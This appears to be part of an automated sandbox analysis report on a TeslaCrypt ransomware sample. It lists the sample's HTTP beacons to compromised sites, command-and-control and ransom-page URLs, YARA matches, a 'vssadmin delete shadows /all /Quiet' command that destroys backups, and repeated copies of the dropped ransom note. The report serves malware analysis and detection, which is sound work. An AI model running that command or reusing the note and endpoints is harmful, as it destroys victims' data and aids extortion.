data=EDABFB9522AF63ECAC9CB6CDD6B5046625B5C643A8053D04397D37F3DDD40D406B647D1A420C164B2BD095D51CC08D6C0DB4685B654C1DF26BECE64AC3694E6BE8E55BBAB3973A3A3AC780A2E1B20FE1CD3C359B0894C6AF71ED8EB38864AA9BBBEC98CED1BCBBA9958A37CB50C6695B33BBD8EC983A825E22DFEDF860E76160ADA557DC4C3D7826579971821CDF808DA804AACEF4BEE438F906D1311E4EE9EF773338E8BDDDB9F4EF978E04BA91A85BDE53219A8C4C67429F0C3F21E6CA36D6EB24298B7E9580E3AE43685A3CDDB22B0B52B27DE0B6FCD056C335104BE2DAA7E2FBCABAA0DF797670751B0F6A55E10802722DFCCB1CFC24F174B8F53906F5BF1AC08DA7636C540731D465D0CB6D97E891C9192C99AAD2F90923D8548A946C5B6EACF7A1FAEEADE2E67AD5E9593C46470A879D46124010FAB7D2BB470C779C69
            Source: global trafficHTTP traffic detected: POST /tmp/mzsys.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like GeckoHost: iicsdrd.comContent-Length: 645Cache-Control: no-cacheData Raw: 64 61 74 61 3d 45 44 41 42 46 42 39 35 32 32 41 46 36 33 45 43 41 43 39 43 42 36 43 44 44 36 42 35 30 34 36 36 32 35 42 35 43 36 34 33 41 38 30 35 33 44 30 34 33 39 37 44 33 37 46 33 44 44 44 34 30 44 34 30 36 42 36 34 37 44 31 41 34 32 30 43 31 36 34 42 32 42 44 30 39 35 44 35 31 43 43 30 38 44 36 43 30 44 42 34 36 38 35 42 36 35 34 43 31 44 46 32 36 42 45 43 45 36 34 41 43 33 36 39 34 45 36 42 45 38 45 35 35 42 42 41 42 33 39 37 33 41 33 41 33 41 43 37 38 30 41 32 45 31 42 32 30 46 45 31 43 44 33 43 33 35 39 42 30 38 39 34 43 36 41 46 37 31 45 44 38 45 42 33 38 38 36 34 41 41 39 42 42 42 45 43 39 38 43 45 44 31 42 43 42 42 41 39 39 35 38 41 33 37 43 42 35 30 43 36 36 39 35 42 33 33 42 42 44 38 45 43 39 38 33 41 38 32 35 45 32 32 44 46 45 44 46 38 36 30 45 37 36 31 36 30 41 44 41 35 35 37 44 43 34 43 33 44 37 38 32 36 35 37 39 39 37 31 38 32 31 43 44 46 38 30 38 44 41 38 30 34 41 41 43 45 46 34 42 45 45 34 33 38 46 39 30 36 44 31 33 31 31 45 34 45 45 39 45 46 37 37 33 33 33 38 45 38 42 44 44 44 42 39 46 34 45 46 39 37 38 45 30 34 42 41 39 31 41 38 35 42 44 45 35 33 32 31 39 41 38 43 34 43 36 37 34 32 39 46 30 43 33 46 32 31 45 36 43 41 33 36 44 36 45 42 32 34 32 39 38 42 37 45 39 35 38 30 45 33 41 45 34 33 36 38 35 41 33 43 44 44 42 32 32 42 30 42 35 32 42 32 37 44 45 30 42 36 46 43 44 30 35 36 43 33 33 35 31 30 34 42 45 32 44 41 41 37 45 32 46 42 43 41 42 41 41 30 44 46 37 39 37 36 37 30 37 35 31 42 30 46 36 41 35 35 45 31 30 38 30 32 37 32 32 44 46 43 43 42 31 43 46 43 32 34 46 31 37 34 42 38 46 35 33 39 30 36 46 35 42 46 31 41 43 30 38 44 41 37 36 33 36 43 35 34 30 37 33 31 44 34 36 35 44 30 43 42 36 44 39 37 45 38 39 31 43 39 31 39 32 43 39 39 41 41 44 32 46 39 30 39 32 33 44 38 35 34 38 41 39 34 36 43 35 42 36 45 41 43 46 37 41 31 46 41 45 45 41 44 45 32 45 36 37 41 44 35 45 39 35 39 33 43 34 36 34 37 30 41 38 37 39 44 34 36 31 32 34 30 31 30 46 41 42 37 44 32 42 42 34 37 30 43 37 37 39 43 36 39 Data Ascii: data=EDABFB9522AF63ECAC9CB6CDD6B5046625B5C643A8053D04397D37F3DDD40D406B647D1A420C164B2BD095D51CC08D6C0DB4685B654C1DF26BECE64AC3694E6BE8E55BBAB3973A3A3AC780A2E1B20FE1CD3C359B0894C6AF71ED8EB38864AA9BBBEC98CED1BCBBA9958A37CB50C6695B33BBD8EC983A825E22DFEDF860E76160ADA557DC4C3D7826579971821CDF808DA804AACEF4BEE438F906D1311E4EE9EF773338E8BDDDB9F4EF978E04BA91A85BDE53219A8C4C67429F0C3F21E6CA36D6EB24298B7E9580E3AE43685A3CDDB22B0B52B27DE0B6FCD056C335104BE2DAA7E2FBCABAA0DF797670751B0F6A55E10802722DFCCB1CFC24F174B8F53906F5BF1AC08DA7636C540731D465D0CB6D97E891C9192C99AAD2F90923D8548A946C5B6EACF7A1FAEEADE2E67AD5E9593C46470A879D46124010FAB7D2BB470C779C69
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041BE60 InternetReadFile,4_1_0041BE60
            Source: unknownDNS traffic detected: queries for: southinstrument.org
            Source: unknownHTTP traffic detected: POST /modules/mod_fxprev/libraries/mzsys.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like GeckoHost: educarpetas.comContent-Length: 645Cache-Control: no-cacheData Raw: 64 61 74 61 3d 45 44 41 42 46 42 39 35 32 32 41 46 36 33 45 43 41 43 39 43 42 36 43 44 44 36 42 35 30 34 36 36 32 35 42 35 43 36 34 33 41 38 30 35 33 44 30 34 33 39 37 44 33 37 46 33 44 44 44 34 30 44 34 30 36 42 36 34 37 44 31 41 34 32 30 43 31 36 34 42 32 42 44 30 39 35 44 35 31 43 43 30 38 44 36 43 30 44 42 34 36 38 35 42 36 35 34 43 31 44 46 32 36 42 45 43 45 36 34 41 43 33 36 39 34 45 36 42 45 38 45 35 35 42 42 41 42 33 39 37 33 41 33 41 33 41 43 37 38 30 41 32 45 31 42 32 30 46 45 31 43 44 33 43 33 35 39 42 30 38 39 34 43 36 41 46 37 31 45 44 38 45 42 33 38 38 36 34 41 41 39 42 42 42 45 43 39 38 43 45 44 31 42 43 42 42 41 39 39 35 38 41 33 37 43 42 35 30 43 36 36 39 35 42 33 33 42 42 44 38 45 43 39 38 33 41 38 32 35 45 32 32 44 46 45 44 46 38 36 30 45 37 36 31 36 30 41 44 41 35 35 37 44 43 34 43 33 44 37 38 32 36 35 37 39 39 37 31 38 32 31 43 44 46 38 30 38 44 41 38 30 34 41 41 43 45 46 34 42 45 45 34 33 38 46 39 30 36 44 31 33 31 31 45 34 45 45 39 45 46 37 37 33 33 33 38 45 38 42 44 44 44 42 39 46 34 45 46 39 37 38 45 30 34 42 41 39 31 41 38 35 42 44 45 35 33 32 31 39 41 38 43 34 43 36 37 34 32 39 46 30 43 33 46 32 31 45 36 43 41 33 36 44 36 45 42 32 34 32 39 38 42 37 45 39 35 38 30 45 33 41 45 34 33 36 38 35 41 33 43 44 44 42 32 32 42 30 42 35 32 42 32 37 44 45 30 42 36 46 43 44 30 35 36 43 33 33 35 31 30 34 42 45 32 44 41 41 37 45 32 46 42 43 41 42 41 41 30 44 46 37 39 37 36 37 30 37 35 31 42 30 46 36 41 35 35 45 31 30 38 30 32 37 32 32 44 46 43 43 42 31 43 46 43 32 34 46 31 37 34 42 38 46 35 33 39 30 36 46 35 42 46 31 41 43 30 38 44 41 37 36 33 36 43 35 34 30 37 33 31 44 34 36 35 44 30 43 42 36 44 39 37 45 38 39 31 43 39 31 39 32 43 39 39 41 41 44 32 46 39 30 39 32 33 44 38 35 34 38 41 39 34 36 43 35 42 36 45 41 43 46 37 41 31 46 41 45 45 41 44 45 32 45 36 37 41 44 35 45 39 35 39 33 43 34 36 34 37 30 41 38 37 39 44 34 36 31 32 34 30 31 30 46 41 42 37 44 32 42 42 34 37 30 43 37 37 39 43 36 39 Data Ascii: data=EDABFB9522AF63ECAC9CB6CDD6B5046625B5C643A8053D04397D37F3DDD40D406B647D1A420C164B2BD095D51CC08D6C0DB4685B654C1DF26BECE64AC3694E6BE8E55BBAB3973A3A3AC780A2E1B20FE1CD3C359B0894C6AF71ED8EB38864AA9BBBEC98CED1BCBBA9958A37CB50C6695B33BBD8EC983A825E22DFEDF860E76160ADA557DC4C3D7826579971821CDF808DA804AACEF4BEE438F906D1311E4EE9EF773338E8BDDDB9F4EF978E04BA91A85BDE53219A8C4C67429F0C3F21E6CA36D6EB24298B7E9580E3AE43685A3CDDB22B0B52B27DE0B6FCD056C335104BE2DAA7E2FBCABAA0DF797670751B0F6A55E10802722DFCCB1CFC24F174B8F53906F5BF1AC08DA7636C540731D465D0CB6D97E891C9192C99AAD2F90923D8548A946C5B6EACF7A1FAEEADE2E67AD5E9593C46470A879D46124010FAB7D2BB470C779C69
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 24 Mar 2021 17:31:33 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: mllvvvh.exe, 00000004.00000003.383913160.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://bddadmin.desjardins.fr/
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.383939672.0000000000727000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.386414484.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.php
            Source: mllvvvh.exe, 00000004.00000003.386389071.000000000074A000.00000004.00000001.sdmpString found in binary or memory: http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.php;
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.phplp.com/BC32439525276
            Source: mllvvvh.exe, 00000004.00000003.469343744.0000000000777000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.php
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.php1
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpE
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpK
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpParameters
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phph
            Source: mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpo
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://educarpetas.com/
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://educarpetas.com/modules/mod_fxprev/libraries/mzsys.php
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://educarpetas.com/modules/mod_fxprev/libraries/mzsys.phpY
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpString found in binary or memory: http://grant-pro.com/templates/beez3/html/com_newsfeeds/categories/mzsys.php
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://grant-pro.com/templates/beez3/html/com_newsfeeds/categories/mzsys.phpindows
            Source: mllvvvh.exeString found in binary or memory: http://h5534bvnrnkj345.ma
            Source: mllvvvh.exe, 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://h5534bvnrnkj345.maniupulp.com/%S
            Source: mllvvvh.exeString found in binary or memory: http://h5534bvnrnkj345.maniupulp.com/%S3.
            Source: help_recover_instructions+fnc.html274.4.drString found in binary or memory: http://h5534bvnrnkj345.maniupulp.com/BC32439525276233
            Source: mllvvvh.exe, 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S
            Source: mllvvvh.exeString found in binary or memory: http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%SIf
            Source: help_recover_instructions+fnc.html274.4.drString found in binary or memory: http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/BC32439525276233
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/dows
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/tmp/mzsys.php
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/tmp/mzsys.php;
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/tmp/mzsys.phpFv
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/tmp/mzsys.phpc
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/tmp/mzsys.phpj
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/tmp/mzsys.phpm
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://iicsdrd.com/tmp/mzsys.phpys.php
            Source: safecrypt.exe, 00000000.00000003.323290107.0000000002910000.00000004.00000001.sdmp, mllvvvh.exe, 00000002.00000003.328099442.00000000027C0000.00000004.00000001.sdmp, mllvvvh.exe, 00000012.00000003.351881255.0000000002900000.00000004.00000001.sdmp, mllvvvh.exe, 00000016.00000003.369476609.0000000002930000.00000004.00000001.sdmp, mllvvvh.exe, 00000018.00000003.386782639.0000000002900000.00000004.00000001.sdmpString found in binary or memory: http://pot98bza3sgfjr35t.faustti
            Source: mllvvvh.exe, 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://pot98bza3sgfjr35t.fausttime.com/%S
            Source: mllvvvh.exeString found in binary or memory: http://pot98bza3sgfjr35t.fausttime.com/%S2.
            Source: help_recover_instructions+fnc.html274.4.drString found in binary or memory: http://pot98bza3sgfjr35t.fausttime.com/BC32439525276233
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://southinstrument.org/
            Source: mllvvvh.exe, 00000004.00000003.383913160.0000000000704000.00000004.00000001.sdmpString found in binary or memory: http://southinstrument.org/templates/protostar/less/mzsys.php
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://southinstrument.org/templates/protostar/less/mzsys.phpG
            Source: mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpString found in binary or memory: http://southinstrument.org/templates/protostar/less/mzsys.phpu
            Source: help_recover_instructions+fnc.html274.4.drString found in binary or memory: http://www.torproject.org/projects/torbrowser.html.en
            Source: mllvvvh.exe, 00000004.00000003.361953647.000000000076D000.00000004.00000001.sdmp, help_recover_instructions+fnc.txt76.4.dr, help_recover_instructions+fnc.html274.4.drString found in binary or memory: https://translate.google.com
            Source: safecrypt.exe, 00000000.00000002.326079443.0000000000ABA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Yara detected TeslaCrypt RansomwareShow sources
            Source: Yara matchFile source: 00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.360977182.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000001.371854756.0000000000400000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.373053534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 1724, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 5844, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 5860, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: safecrypt.exe PID: 5784, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mllvvvh.exe PID: 5880, type: MEMORY
            Source: Yara matchFile source: 4.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.safecrypt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.1.safecrypt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.1.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.1.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.mllvvvh.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 25.2.mllvvvh.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.1.safecrypt.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Deletes shadow drive data (may be related to ransomware)Show sources
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet Jump to behavior
            Source: mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
            Source: vssadmin.exe, 00000008.00000002.339155452.000001A8958F5000.00000004.00000040.sdmpBinary or memory string: C:\Windows\System32\vssadmin.exedeleteshadows/all/QuietZ
            Source: vssadmin.exe, 00000008.00000002.339181911.000001A895930000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet C:\Windows\System32\vssadmin.exeWinsta0\Default
            Source: vssadmin.exe, 00000008.00000002.339181911.000001A895930000.00000004.00000020.sdmpBinary or memory string: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /Type=ClientAccessible /For=C:
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: vssadmin Delete Shadows
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete Shadows /For=C: /Oldest
            Source: vssadmin.exe, 00000008.00000002.339130539.000001A8958E0000.00000002.00000001.sdmpBinary or memory string: Example Usage: vssadmin Delete ShadowStorage /For=C: /On=D:
            Found potential ransomware demand textShow sources
            Source: mllvvvh.exe, 00000004.00000003.361953647.000000000076D000.00000004.00000001.sdmpString found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
            Source: mllvvvh.exe, 00000004.00000003.361953647.000000000076D000.00000004.00000001.sdmpString found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
            Source: help_recover_instructions+fnc.txt76.4.drString found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
            Source: help_recover_instructions+fnc.txt76.4.drString found in binary or memory: Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
            May disable shadow drive data (uses vssadmin)Show sources
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet Jump to behavior
            Writes a notice file (html or txt) to demand a ransomShow sources
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\$Recycle.Bin\S-1-5-18\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1000\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1001\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\$Recycle.Bin\S-1-5-21-3853321935-2125563209-4053062332-1002\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\$Recycle.Bin\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\ProgramData\Adobe\ARM\Reader_19.012.20034\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeFile dropped: C:\ProgramData\Adobe\ARM\S\11357\help_recover_instructions+fnc.txt -> decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.what do i do ?so, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining bitcoin now! , and restore your data easy way.if you have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.for more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:1. http://pot98bza3sgfjr35t.fausttime.com/bc324395252762332. http://h5534bvnrnkj345.maniupulp.com/bc324395252762333. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/bc32439525276233if for some reasons the addresses are not available, follow these steps:1. download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en 2. after a successful installation, run the browser and wait for initialization.3. type in the addJump to dropped file
